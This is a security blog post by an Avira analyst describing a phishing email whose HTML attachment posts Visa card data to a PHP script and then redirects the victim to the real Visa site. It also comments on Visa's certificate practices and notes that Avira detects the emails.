Phishing getting "Verified" (Update)

Not a week passes by without me being astonished about the inventiveness of online scammers. Last week I wrote about a method used to direct the user to a Phishing page by using html attachments.

Now we are seeing a slightly altered method to direct the user to the fake URL which made me wonder – who do they try to fool? The email is written in an absolutely terrible German language which makes almost no sense to the reader. The text is so badly written that I suspect that the output is created by some automatic translation software (a really bad one).

As soon as the user finally understands that he has to click on the HTML attachment in order to send the form to Visa and is daring enough to actually do that, then the window below is opened (the left part of the image).

In the text there are the words “Activate Now” two times (marked with a red square). Strangely the submit button has the text “Confirm Now” and not “Activate Now”. After clicking on the button, I understood why the text is there: On the right part of the screenshot of the web page you find the exact text “Activate Now” again (also marked with a red square).

And here comes the catch: Hitting the button “Confirm Now” in the first form leads to posting the values to a server with a PHP script which immediately after storing the data somewhere automatically redirects the web browser to the official page of Visa.com: https://verified.visa.com/aam/data/default/landing.aam?partner=default&resize=yes.

During the redirect the window is automatically resized to the size of the html page in the email attachment – at such a small size the URL becomes almost invisible. The scammers seem to hope that their victims don’t notice the change from the “file:///”-URL to the “http://”-URL in the address bar.

During this Phishing analysis, another problem became obvious though: On the official VISA website, you see in the URL bar the marking “visa.com”, showing that the domain is what it pretends to be which is verified by a certificate. That’s very nice and gives a good sense of security, despite the fact that Visa seems to have forgotten to copy the favicon.ico on the server.

By clicking on the “visa.com” name or on the favicon, the web browser shows more detailed information about the certificate. The good sense of security disappears quite fast because you can see that everything was done somehow unprofessional. It is not very nice to have the certificate without an official owner – especially for financial institutions, so-called extended validation certificates (for example EV-SSL) should be used. My guess is that this was done this way in order to save some money – usually, they would have to buy a separated certificate for each localized website and server (Akamai offers such a service, but it is quite expensive).

In comparison how to make it better, here is how the certificate information looks for Paypal.

You get clear informed about who is owning the certificate.

As usual, Avira anti malware software detects these emails as Phishing and also blocks the URL accordingly.

Update:

Virus Bulletin has added this technique with the name “The Responsibility Transfer” into the Spammer’s Compendium.

Sorin Mustaca
Data Security Expert